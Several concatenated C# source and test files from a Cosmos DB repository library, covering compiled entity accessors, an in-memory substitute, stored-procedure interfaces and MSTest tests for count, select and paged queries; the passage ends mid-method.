    // Document id, read/written through the property whose JSON name is "id" (required).
    public DocumentId Id
    {
        get => GetId(Entity);
        set => SetId(Entity, value);
    }

    // Optimistic-concurrency tag, mapped to the optional "_etag" JSON property.
    public string ETag
    {
        get => GetETag(Entity);
        set => SetETag(Entity, value);
    }

    // Last-modified timestamp, mapped to the optional "_ts" JSON property (must be long if present).
    public long TS
    {
        get => GetTS(Entity);
        set => SetTS(Entity, value);
    }

    static EntityStorage()
    {
        // Resolve each property's effective JSON name: [JsonProperty] override, else the CLR name.
        (string name, PropertyInfo info) GetPropertyJsonName(PropertyInfo pi)
        {
            var jsonProperty = pi.GetCustomAttribute<JsonPropertyAttribute>();
            return (jsonProperty?.PropertyName ?? pi.Name, pi);
        }
        var properties = typeof(T).GetProperties().Select(GetPropertyJsonName).ToDictionary(o => o.name, o => o.info);

        // "id" is mandatory: the indexer throws when T has no property mapped to "id".
        var idProperty = properties["id"];
        GetId = BuildIdGet(idProperty, true);
        SetId = BuildIdSet(idProperty, true);

        // "_etag" and "_ts" are optional; missing properties fall back to no-op/default accessors.
        properties.TryGetValue("_etag", out var eTagProperty);
        GetETag = BuildETagGet(eTagProperty, false);
        SetETag = BuildETagSet(eTagProperty, false);
        properties.TryGetValue("_ts", out var tsProperty);
        GetTS = BuildTSGet(tsProperty);
        SetTS = BuildTSSet(tsProperty);
    }

    public EntityStorage(T entity)
    {
        // Clone so later mutations by the caller cannot alter the stored document.
        Entity = DeepClone(entity);
    }

    // Compiles: source => (DocumentId)source.<idProperty>. Relies on a conversion from the
    // property type to DocumentId existing (Expression.Convert picks up user-defined conversions).
    private static Func<T, DocumentId> BuildIdGet(PropertyInfo idProperty, bool required)
    {
        if (idProperty == default)
        {
            if (required)
                throw new InvalidOperationException("Missing field");
            return _ => default;
        }
        var source = Expression.Parameter(typeof(T), "source");
        Expression IdProperty = Expression.Property(source, idProperty);
        // var converter = typeof(DocumentId).GetMethod("op_Implicit", new[] { idProperty.PropertyType });
        // IdProperty = Expression.Call(converter, IdProperty);
        IdProperty = Expression.Convert(IdProperty, typeof(DocumentId));
        return Expression.Lambda<Func<T, DocumentId>>(IdProperty, source).Compile();
    }

    // Compiles: (source, value) => source.<idProperty> = (PropertyType)value.
    // A read-only id property yields a setter that throws on use rather than at type-init time.
    private static Action<T, DocumentId> BuildIdSet(PropertyInfo idProperty, bool required)
    {
        if (idProperty == default)
        {
            if (required)
                throw new InvalidOperationException("Missing field");
            return (_, __) => { };
        }
        if (!idProperty.CanWrite)
        {
            return (_, __) => throw new InvalidOperationException("The id property is not assignable");
        }
        var source = Expression.Parameter(typeof(T), "source");
        var value = Expression.Parameter(typeof(DocumentId), "value");
        Expression IdProperty = Expression.Property(source, idProperty);
        var body = Expression.Assign(IdProperty, Expression.Convert(value, idProperty.PropertyType));
        return Expression.Lambda<Action<T, DocumentId>>(body, source, value).Compile();
    }

    // Compiles: source => source.<etagProperty>[.ToString()]. Non-string properties are
    // stringified via their parameterless ToString().
    private static Func<T, string> BuildETagGet(PropertyInfo idProperty, bool required)
    {
        if (idProperty == default)
        {
            if (required)
                throw new InvalidOperationException("Missing field");
            return _ => default;
        }
        var source = Expression.Parameter(typeof(T), "source");
        Expression IdProperty = Expression.Property(source, idProperty);
        if (idProperty.PropertyType != typeof(string))
        {
            IdProperty = Expression.Call(IdProperty, "ToString", new Type[0]);
        }
        return Expression.Lambda<Func<T, string>>(IdProperty, source).Compile();
    }

    // Compiles: (source, value) => source.<etagProperty> = value, converting non-string
    // properties via their static Parse(string). Assumes such a Parse method exists for
    // non-string ETag properties — GetMethod returning null would fail here.
    // NOTE(review): the "id property" wording in the error below is reused from BuildIdSet
    // even though this builder handles the _etag property.
    private static Action<T, string> BuildETagSet(PropertyInfo idProperty, bool required)
    {
        if (idProperty == default)
        {
            if (required)
                throw new InvalidOperationException("Missing field");
            return (_, __) => { };
        }
        if (!idProperty.CanWrite)
        {
            return (_, __) => throw new InvalidOperationException("The id property is not assignable");
        }
        var source = Expression.Parameter(typeof(T), "source");
        var value = Expression.Parameter(typeof(string), "value");
        Expression IdProperty = Expression.Property(source, idProperty);
        var body = idProperty.PropertyType != typeof(string)
            ? Expression.Assign(IdProperty, Expression.Call(idProperty.PropertyType.GetMethod("Parse", new[] { typeof(string) }), value))
            : Expression.Assign(IdProperty, value);
        return Expression.Lambda<Action<T, string>>(body, source, value).Compile();
    }

    // Compiles: source => source.<tsProperty>. The _ts property, when declared, must be long.
    private static Func<T, long> BuildTSGet(PropertyInfo idProperty)
    {
        if (idProperty == default)
        {
            return _ => 0;
        }
        if (idProperty.PropertyType != typeof(long))
        {
            throw new InvalidOperationException("_ts is not type long");
        }
        var source = Expression.Parameter(typeof(T), "source");
        Expression IdProperty = Expression.Property(source, idProperty);
        return Expression.Lambda<Func<T, long>>(IdProperty, source).Compile();
    }

    // Compiles: (source, value) => source.<tsProperty> = value.
    // NOTE(review): the error message again says "id property" though this targets _ts.
    private static Action<T, long> BuildTSSet(PropertyInfo idProperty)
    {
        if (idProperty == default)
        {
            return (_, __) => { };
        }
        if (!idProperty.CanWrite)
        {
            return (_, __) => throw new InvalidOperationException("The id property is not assignable");
        }
        var source = Expression.Parameter(typeof(T), "source");
        var value = Expression.Parameter(typeof(long), "value");
        Expression IdProperty = Expression.Property(source, idProperty);
        var body = Expression.Assign(IdProperty, value);
        return Expression.Lambda<Action<T, long>>(body, source, value).Compile();
    }
}
// Manufactures a DocumentClientException carrying the given status code and message.
// The SDK exposes no public constructor for it, so the instance is created uninitialized
// and its StatusCode property and private _message field are populated via reflection.
// NOTE: this depends on SDK internals (_dbExceptionType, the "_message" field name) and
// can break if the Azure DocumentDB client library changes its internal layout.
private static DocumentClientException CreateDbException(HttpStatusCode statusCode, string message = default)
{
    var ex = (DocumentClientException)FormatterServices.GetUninitializedObject(_dbExceptionType);
    _dbExceptionType.GetProperty("StatusCode").SetValue(ex, statusCode);
    _dbExceptionType.GetField("_message", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(ex, message);
    return ex;
}
/// <summary>
/// Optimistic-concurrency check: returns true (and a PreconditionFailed exception via
/// <paramref name="exception"/>) when the caller's ETag no longer matches the stored entity's.
/// </summary>
private bool CheckETag(T item, EntityStorage entity, out DocumentClientException exception)
{
    var requestETag = new EntityStorage(item).ETag;

    if (requestETag == entity.ETag)
    {
        exception = default;
        return false;
    }

    exception = CreateDbException(HttpStatusCode.PreconditionFailed, "ETag mismatch");
    return true;
}
}
}
<file_sep>using CosmosDbRepository;
using System;
namespace CosmosDbRepositorySubstituteTest
{
/// <summary>
/// Disposable test fixture contract: exposes the repository under test and is disposed
/// at the end of each test to release whatever resources the implementation created.
/// </summary>
public interface ITestingContext<T>
    : IDisposable
{
    /// <summary>The repository instance the test exercises.</summary>
    ICosmosDbRepository<T> Repo { get; }
}
}<file_sep>using Newtonsoft.Json;
using System;
namespace CosmosDbRepositoryTest.GuidId
{
// Flat projection DTO used by test queries; the [JsonProperty] names map each member
// to its JSON field ("id", "data", "rank", "fid", "value").
class SubSubDataResult
{
    // Document id ("id").
    [JsonProperty("id")]
    public Guid Id { get; set; }

    // Payload string ("data").
    [JsonProperty("data")]
    public string Data { get; set; }

    // Ordering value ("rank").
    [JsonProperty("rank")]
    public int Rank { get; set; }

    // Id of the flattened sub-sub element ("fid").
    [JsonProperty("fid")]
    public Guid FId { get; set; }

    // Value of the flattened sub-sub element ("value").
    [JsonProperty("value")]
    public string Value { get; set; }
}
}
<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
/// <summary>
/// CountAsync tests. Each test tags its documents with a unique marker string so it
/// only counts data created by its own run.
/// </summary>
[TestClass]
public class CosmosDbRepositoryCountTests
    : CosmosDbRepositoryTests<TestData<Guid>>
{
    [TestMethod]
    public async Task Count_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var marker = Guid.NewGuid().ToString();

            await context.Repo.AddAsync(new TestData<Guid>
            {
                Id = Guid.NewGuid(),
                Data = marker
            });

            int matches = await context.Repo.CountAsync(d => d.Data == marker);
            matches.Should().Be(1);
        }
    }

    [TestMethod]
    public async Task Count_Expect_Success_WithNoData()
    {
        using (var context = CreateContext())
        {
            var marker = Guid.NewGuid().ToString();

            // Nothing was written with this marker, so the count must be zero.
            int matches = await context.Repo.CountAsync(d => d.Data == marker);
            matches.Should().Be(0);
        }
    }

    [TestMethod]
    public async Task Count_MultipleRecords_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var marker = Guid.NewGuid().ToString();

            await context.Repo.AddAsync(new TestData<Guid>
            {
                Id = Guid.NewGuid(),
                Data = marker,
                Rank = 1
            });

            await context.Repo.AddAsync(new TestData<Guid>
            {
                Id = Guid.NewGuid(),
                Data = marker,
                Rank = 2
            });

            int matches = await context.Repo.CountAsync(d => d.Data == marker);
            matches.Should().Be(2);
        }
    }
}
}
<file_sep>using Microsoft.Azure.Documents;
namespace CosmosDbRepository
{
/// <summary>
/// Fluent builder for configuring and constructing an <see cref="ICosmosDbRepository"/>.
/// Configuration methods return a builder so calls can be chained before <see cref="Build"/>.
/// </summary>
public interface ICosmosDbRepositoryBuilder
{
    /// <summary>Sets the repository/collection id.</summary>
    ICosmosDbRepositoryBuilder WithId(string name);

    /// <summary>Sets the default throughput (null leaves the service default in place).</summary>
    ICosmosDbRepositoryBuilder WithThroughput(int? defaultThroughput);

    /// <summary>Adds an included index path with its index definitions.</summary>
    ICosmosDbRepositoryBuilder IncludeIndexPath(string path, params Index[] indexes);

    /// <summary>Adds one or more excluded index paths.</summary>
    ICosmosDbRepositoryBuilder ExcludeIndexPath(params string[] paths);

    /// <summary>Registers a stored procedure (id plus JavaScript body) to create with the repository.</summary>
    ICosmosDbRepositoryBuilder StoredProcedure(string id, string body);

    /// <summary>Materializes the repository against the given client and database.</summary>
    ICosmosDbRepository Build(IDocumentClient client, ICosmosDb documentDb, int? defaultThroughput);
}
}
<file_sep>using System;
namespace CosmosDbRepository
{
/// <summary>
/// Class-level attribute that associates a repository name with the decorated type.
/// </summary>
[AttributeUsage(validOn: AttributeTargets.Class)]
public class CosmosDbRepositoryNameAttribute
    : Attribute
{
    /// <summary>The name supplied at the attribute site.</summary>
    public string Name { get; }

    public CosmosDbRepositoryNameAttribute(string name) => Name = name;
}
}<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
// SelectAsync / SelectManyAsync projection tests. Rank values are seeded with known
// multiplicities (rank 1 once, rank 2 twice, rank 3 three times) so raw vs Distinct()
// result counts can be asserted exactly.
[TestClass]
public class CosmosDbRepositorySelectTests
    : CosmosDbRepositoryTests<TestData<Guid>>
{
    // Projects Rank for the seeded documents; with no Distinct clause duplicates are kept,
    // with q.Distinct() each rank appears once.
    [TestMethod]
    public async Task Select_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            // Seed: one rank-1, two rank-2, three rank-3 documents sharing the unique marker.
            var data1 = await GetTestData(context, uniqueData, 1);
            var data2a = await GetTestData(context, uniqueData, 2);
            var data2b = await GetTestData(context, uniqueData, 2);
            var data3a = await GetTestData(context, uniqueData, 3);
            var data3b = await GetTestData(context, uniqueData, 3);
            var data3c = await GetTestData(context, uniqueData, 3);

            // All six documents, duplicates included.
            var results = await context.Repo.SelectAsync(
                d => d.Rank,
                whereClauses: q => q.Where(d => d.Data == uniqueData));
            results.Should().NotBeNull();
            results.Count().Should().Be(6);

            // Distinct collapses to the three rank values.
            results = await context.Repo.SelectAsync(
                d => d.Rank,
                q => q.Where(d => d.Data == uniqueData),
                q => q.Distinct());
            results.Should().NotBeNull();
            results.Count().Should().Be(3);

            // Per-rank filters: counts match the seeding multiplicity; Distinct always yields 1.
            results = await context.Repo.SelectAsync(
                d => d.Rank,
                whereClauses: q => q.Where(d => d.Data == uniqueData && d.Rank == 1));
            results.Should().NotBeNull();
            results.Count().Should().Be(1);
            results = await context.Repo.SelectAsync(
                d => d.Rank,
                q => q.Where(d => d.Data == uniqueData && d.Rank == 1),
                q => q.Distinct());
            results.Should().NotBeNull();
            results.Count().Should().Be(1);
            results = await context.Repo.SelectAsync(
                d => d.Rank,
                whereClauses: q => q.Where(d => d.Data == uniqueData && d.Rank == 2));
            results.Should().NotBeNull();
            results.Count().Should().Be(2);
            results = await context.Repo.SelectAsync(
                d => d.Rank,
                q => q.Where(d => d.Data == uniqueData && d.Rank == 2),
                q => q.Distinct());
            results.Should().NotBeNull();
            results.Count().Should().Be(1);
            results = await context.Repo.SelectAsync(
                d => d.Rank,
                whereClauses: q => q.Where(d => d.Data == uniqueData && d.Rank == 3));
            results.Should().NotBeNull();
            results.Count().Should().Be(3);
            results = await context.Repo.SelectAsync(
                d => d.Rank,
                q => q.Where(d => d.Data == uniqueData && d.Rank == 3),
                q => q.Distinct());
            results.Should().NotBeNull();
            results.Count().Should().Be(1);
        }
    }

    // SelectManyAsync flattens the nested Subdata/SubSubData collections; the expected
    // count is recomputed locally from the seeded objects.
    [TestMethod]
    public async Task Select_DistinctCount_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            // Same rank multiplicities as above, but each document also gets random sub-data.
            var data1 = await GetTestData(context, uniqueData, 1, CreateSubData);
            var data2a = await GetTestData(context, uniqueData, 2, CreateSubData);
            var data2b = await GetTestData(context, uniqueData, 2, CreateSubData);
            var data3a = await GetTestData(context, uniqueData, 3, CreateSubData);
            var data3b = await GetTestData(context, uniqueData, 3, CreateSubData);
            var data3c = await GetTestData(context, uniqueData, 3, CreateSubData);
            var results = await context.Repo.SelectAsync(
                d => d.Rank,
                whereClauses: q => q.Where(d => d.Data == uniqueData));
            results.Should().NotBeNull();
            results.Count().Should().Be(6);
            var groupResults = await context.Repo.SelectManyAsync(
                d => d.Subdata.SelectMany(e => e.SubSubData).Select(f => new { d.Id, d.Data, d.Rank, fId = f.Id, f.Value }),
                q => q.Where(d => d.Data == uniqueData));
            groupResults.Should().NotBeNull();
            // Expected row count = total SubSubData elements across all seeded documents.
            var count = new[] { data1, data2a, data2b, data3a, data3b, data3c }.SelectMany(a => a.Subdata.SelectMany(b => b.SubSubData)).Count();
            groupResults.Count().Should().Be(count);
        }
    }

    // Populates a document with 0-4 Subdata elements, each holding 0-4 SubSubData elements
    // with random values (so some documents may legitimately have no sub-data at all).
    private void CreateSubData(TestData<Guid> data)
    {
        var rand = new Random();
        data.Subdata = Enumerable.Range(0, rand.Next(0, 5))
            .Select(i =>
                new TestSubData
                {
                    SubSubData = Enumerable.Range(0, rand.Next(0, 5))
                        .Select(j => new TestSubSubData
                        {
                            Id = Guid.NewGuid(),
                            Value = rand.Next(256).ToString()
                        })
                        .ToArray()
                })
            .ToArray();
    }
}
}
<file_sep>[](https://dev.azure.com/jltconsulting/CosmosDbRepository/_build/latest?definitionId=2?branchName=master)
[](https://www.nuget.org/packages/CosmosDbRepository/)
<file_sep>using System.Threading.Tasks;
namespace CosmosDbRepository
{
// Typed stored-procedure contracts. One interface per arity: IStoredProcedure<TResult> takes
// no parameters; each following variant adds one positional parameter (up to 16), all
// returning Task<TResult>. The pattern is identical for every arity below.

/// <summary>Parameterless stored procedure returning <typeparamref name="TResult"/>.</summary>
public interface IStoredProcedure<TResult>
{
    Task<TResult> ExecuteAsync();
}

/// <summary>Single-parameter stored procedure returning <typeparamref name="TResult"/>.</summary>
public interface IStoredProcedure<TParam, TResult>
{
    Task<TResult> ExecuteAsync(TParam param);
}
public interface IStoredProcedure<TParam1, TParam2, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>
{
    Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15, TParam16 param16);
}
}<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
// Paging tests for FindAsync using page size 1 and continuation tokens.
[TestClass]
public class CosmosDbRepositoryFindPagedTests
    : CosmosDbRepositoryStringTests
{
    // One matching document: the first page returns it and no continuation token is issued.
    [TestMethod]
    public async Task FindPaged_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var data = new TestData<string>
            {
                Id = GetNewId(),
                Data = uniqueData
            };
            data = await context.Repo.AddAsync(data);
            var dataList = await context.Repo.FindAsync(1, null, d => d.Data == uniqueData);
            dataList.Should().NotBeNull();
            dataList.Items.Should().NotBeNull();
            dataList.Items.Should().BeEquivalentTo(new[] { data });
            dataList.ContinuationToken.Should().BeNull();
        }
    }

    // No matching documents: an empty page, still with no continuation token.
    [TestMethod]
    public async Task FindPaged_Expect_Success_WithNoData()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var dataList = await context.Repo.FindAsync(1, null, d => d.Data == uniqueData);
            dataList.Should().NotBeNull();
            dataList.Items.Should().NotBeNull();
            dataList.Items.Should().BeEmpty();
            dataList.ContinuationToken.Should().BeNull();
        }
    }

    // Two matching documents, page size 1, ordered by Rank: page one yields the first
    // document plus a continuation token; feeding the token back yields the second
    // document and a null token, signalling the end of the result set.
    [TestMethod]
    public async Task FindPaged_WithContinuation_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var data = new TestData<string>
            {
                Id = GetNewId(),
                Data = uniqueData,
                Rank = 1
            };
            data = await context.Repo.AddAsync(data);
            var data2 = new TestData<string>
            {
                Id = GetNewId(),
                Data = uniqueData,
                Rank = 2
            };
            data2 = await context.Repo.AddAsync(data2);
            var dataList = await context.Repo.FindAsync(1, null, d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
            dataList.Should().NotBeNull();
            dataList.Items.Should().NotBeNull();
            dataList.Items.Should().BeEquivalentTo(new[] { data });
            dataList.ContinuationToken.Should().NotBeNull();
            dataList = await context.Repo.FindAsync(1, dataList.ContinuationToken, d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
            dataList.Should().NotBeNull();
            dataList.Items.Should().NotBeNull();
            dataList.Items.Should().BeEquivalentTo(new[] { data2 });
            dataList.ContinuationToken.Should().BeNull();
        }
    }
}
}
<file_sep>using CosmosDbRepository.Substitute;
using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Net;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
namespace CosmosDbRepositorySubstituteTest
{
// Parity tests for the in-memory substitute: each test performs the same operation against
// the real repository context (CreateContext) and the substitute (CreateSubstituteContext)
// and asserts equivalent outcomes, excluding members the substitute stamps differently
// (ETag/UpdateEpoch) or exception texts that cannot match exactly.
[TestClass]
public class SubstituteTest
    : CosmosDbRepositoryTests<TestData<Guid>>
{
    // Add with a caller-supplied id: results match except the stamped ETag/UpdateEpoch,
    // which the substitute must still populate with non-default values.
    [TestMethod]
    public async Task AddWithId()
    {
        var data = new TestData<Guid>
        {
            Id = Guid.NewGuid(),
            Data = "My Data"
        };
        (Exception Exception, TestData<Guid> Result) repoResult;
        using (var context = CreateContext())
        {
            repoResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
        }
        (Exception Exception, TestData<Guid> Result) subResult;
        using (var context = CreateSubstituteContext())
        {
            subResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
        }
        repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
            Regex.IsMatch(su.SelectedMemberPath, "Item2.ETag|Item2.UpdateEpoch")));
        subResult.Result.ETag.Should().NotBeNullOrEmpty();
        subResult.Result.UpdateEpoch.Should().NotBe(0);
    }

    // Add without an id: both implementations must assign one and stamp ETag/UpdateEpoch.
    [TestMethod]
    public async Task AddWithoutId()
    {
        var data = new TestData<Guid>
        {
            Data = "My Data"
        };
        (Exception Exception, TestData<Guid> Result) repoResult;
        using (var context = CreateContext())
        {
            repoResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
        }
        (Exception Exception, TestData<Guid> Result) subResult;
        using (var context = CreateSubstituteContext())
        {
            subResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
        }
        repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
            Regex.IsMatch(su.SelectedMemberPath, "Item2.ETag|Item2.UpdateEpoch")));
        subResult.Result.ETag.Should().NotBeNullOrEmpty();
        subResult.Result.UpdateEpoch.Should().NotBe(0);
    }

    // Delete of a freshly added document succeeds identically in both implementations.
    [TestMethod]
    public async Task DeleteItem()
    {
        var data = new TestData<Guid>
        {
            Id = Guid.NewGuid(),
            Data = "My Data"
        };
        (Exception Exception, bool Result) repoResult;
        using (var context = CreateContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            repoResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
        }
        (Exception Exception, bool) subResult;
        using (var context = CreateSubstituteContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
        }
        repoResult.Should().BeEquivalentTo(subResult);
    }

    // Replace changes the stored ETag, so deleting with the stale instance must fail the
    // same way in both implementations (exception message/inner detail excluded).
    [TestMethod]
    public async Task DeleteItemWithETagChange()
    {
        var data = new TestData<Guid>
        {
            Id = Guid.NewGuid(),
            Data = "My Data"
        };
        (Exception Exception, bool Result) repoResult;
        using (var context = CreateContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            await context.Repo.ReplaceAsync(tmp);
            repoResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
        }
        (Exception Exception, bool) subResult;
        using (var context = CreateSubstituteContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            await context.Repo.ReplaceAsync(tmp);
            subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
        }
        repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
            Regex.IsMatch(su.SelectedMemberPath, "Item1.Message|Item1.InnerException")));
    }

    // An id-based injected fault makes the substitute's delete surface the configured
    // DocumentClientException (wrapped in an AggregateException by the faulted task).
    [TestMethod]
    public async Task DeleteItemByIdWithError()
    {
        var data = new TestData<Guid>
        {
            Id = Guid.NewGuid(),
            Data = "My Data"
        };
        (Exception Exception, bool) subResult;
        using (var context = CreateSubstituteContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            context.Repo.GenerateExceptionOnDeleteWhen(id => data.Id == id, HttpStatusCode.ExpectationFailed);
            await context.Repo.ReplaceAsync(tmp);
            subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
        }
        subResult.Exception.Should().NotBeNull();
        var aggException = subResult.Exception as AggregateException;
        aggException.Should().NotBeNull();
        aggException.InnerExceptions.Should().HaveCount(1);
        var exception = aggException.InnerExceptions[0] as DocumentClientException;
        exception.Should().NotBeNull();
        exception.StatusCode.Should().Be(HttpStatusCode.ExpectationFailed);
    }

    // Same as above, but the fault condition matches on the entity instance rather than the id.
    [TestMethod]
    public async Task DeleteItemByInstanceWithError()
    {
        var data = new TestData<Guid>
        {
            Id = Guid.NewGuid(),
            Data = "My Data"
        };
        (Exception Exception, bool) subResult;
        using (var context = CreateSubstituteContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            context.Repo.GenerateExceptionOnDeleteWhen(inst => data.Id == inst.Id, HttpStatusCode.ExpectationFailed);
            await context.Repo.ReplaceAsync(tmp);
            subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
        }
        subResult.Exception.Should().NotBeNull();
        var aggException = subResult.Exception as AggregateException;
        aggException.Should().NotBeNull();
        aggException.InnerExceptions.Should().HaveCount(1);
        var exception = aggException.InnerExceptions[0] as DocumentClientException;
        exception.Should().NotBeNull();
        exception.StatusCode.Should().Be(HttpStatusCode.ExpectationFailed);
    }

    // Upserting twice with the original (now stale) instance: both implementations must
    // behave equivalently, ignoring exception message/inner detail differences.
    [TestMethod]
    public async Task UpsertItemWithETagChange()
    {
        var data = new TestData<Guid>
        {
            Id = Guid.NewGuid(),
            Data = "My Data"
        };
        (Exception Exception, TestData<Guid> Result) repoResult;
        using (var context = CreateContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            await context.Repo.UpsertAsync(tmp);
            repoResult = await context.Repo.UpsertAsync(tmp).ContinueWith(CaptureResult);
        }
        (Exception Exception, TestData<Guid>) subResult;
        using (var context = CreateSubstituteContext())
        {
            var tmp = await context.Repo.AddAsync(data);
            await context.Repo.UpsertAsync(tmp);
            subResult = await context.Repo.UpsertAsync(tmp).ContinueWith(CaptureResult);
        }
        repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
            Regex.IsMatch(su.SelectedMemberPath, "Item1.Message|Item1.InnerException")));
    }

    // ContinueWith continuation that captures either the task's result or its exception,
    // so faulted and successful outcomes can be compared with a single BeEquivalentTo.
    private (Exception Exception, T Result) CaptureResult<T>(Task<T> task)
    {
        switch (task.Status)
        {
            case TaskStatus.RanToCompletion:
                return (default, task.Result);
            case TaskStatus.Faulted:
                return (task.Exception, default);
            default:
